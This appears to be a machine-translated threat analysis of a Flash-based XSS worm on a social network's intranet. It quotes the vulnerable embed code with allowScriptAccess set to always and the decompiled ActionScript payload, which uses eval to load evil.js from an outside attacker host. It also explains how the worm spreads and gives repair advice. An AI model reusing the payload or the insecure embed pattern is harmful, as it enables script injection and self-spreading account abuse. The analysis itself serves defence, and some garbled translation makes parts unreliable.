Internal Network flash xss worm Threat Analysis

Analysis Source:Know Security (http://www.scanw.com/blog)

Threat nature:
IntranetThe JS function playswf can dynamically create a flash player container (<embed type = "application/x-shockwave-flash"> </embed> ), the created flash player container mistakenly uses the allowScriptAccess attribute. The code snippet is as follows:

playswf=function(el,_4e,_4f){……el.innerHTML=XN.Template.flash({width:w,height:h,filename:_4e});……};XN.template.flash=function(o){return “ <embed src=”"+o.filename+”” type=”application/x-shockwave-flash

” “+”width=”"+(o.width||”320″)+”” height=”"+(o.height||”240″)+””

 allowFullScreen=”true” wmode=”"+(o.wmode||”transparent”)+””

 allowScriptAccess=”always”></embed>”;};

When allowScriptAccess is always, it indicates that the embedded third-party swf file can execute any script, and the execution scope of any script is in the current domain (that is, it complies with the same-source policy ). Attackers can exploit the defects of the playswf function to embed any third-party swf file and execute malicious scripts.

Worm analysis:
After logging on to the internal network, you will see the propagation evidence of this flash xss worm:

When you click a video shared by a friend (this video comes from Tudou), a forged swf is opened, as shown in the following figure. My noscript intercepts it:

What is the malicious flash link: hxxp: // o.99081.com/xnxss/1.swf? Check the decompiled source code. This is an ActionScript script:

// Action script…// [Action in Frame 1]var fun = “var x=document.createElement(”SCRIPT”);x.src=”http://n.99081.com/

xnxss1/evil.js”; x.defer=true;document.getElementsByTagName(”HEAD”)[0].

appendChild(x);”;flash.external.ExternalInterface.call(”eval”, fun);loadMovie(”http://www.tudou.com/player/outside/player_outside.swf?iid=

4120048&default_skin=http://js.tudouui.com/bin/player2/outside/

Skin_outside_13.swf&autostart=false&rurl=”, this);

Use flash first. external. externalInterface. call calls the eval function of the flash external DOM (JavaScript built-in function) to execute a JS script, which will inject http://n.99081.com/xnxss1/evil.jsinto the DOM's

Edevil. what js has done is to use AJAX for quietly spreading, so that you can automatically share the same video. After your friends receive a new reminder, they can watch the video and continue to spread it, how many levels, the worm is like this. The other unimportant details are not mentioned. The key point is: for example, why is a malicious swf file played after you click the thumbnail of the video in the above two images, instead of real video files (videos from Tudou )? Packet Capture analysis, for example (I used Youku's video for a test ):

This is the data submitted in the form captured during video sharing. The summary can be changed to any third-party swf file address, and other fields can be used as needed. This is how edevil. js is spread and used.

Repair suggestions:
This flash xss worm can break out because of the defect of the playswf function mentioned above: allowScriptAccess is insecure when it is always. How can I fix the internal network? The videos shared by users in the internal network should all come from third parties. If allowScriptAccess is not set to always, will the playing of these videos be affected? Otherwise, it is recommended that the value of the summary field be determined in the form submission of the shared video on the Intranet. a whitelist should be set up, only videos from some large and trusted video providers (such as Youku, Tudou, and youtube) can be received ).

Postscript:
When I first saw the worm in the School Intranet, my first response was csrf worm, which is similar to the one I tested last time because there were too many csrf vulnerabilities in the School Intranet and some were very serious, still don't know? Xss worm is detected during analysis. It's just this innovation. It's encapsulated in flash. The web-based worm attack can cause great harm. The worm itself has no harm. What if a trojan is suspended by the way?

Know chuangyu-cosine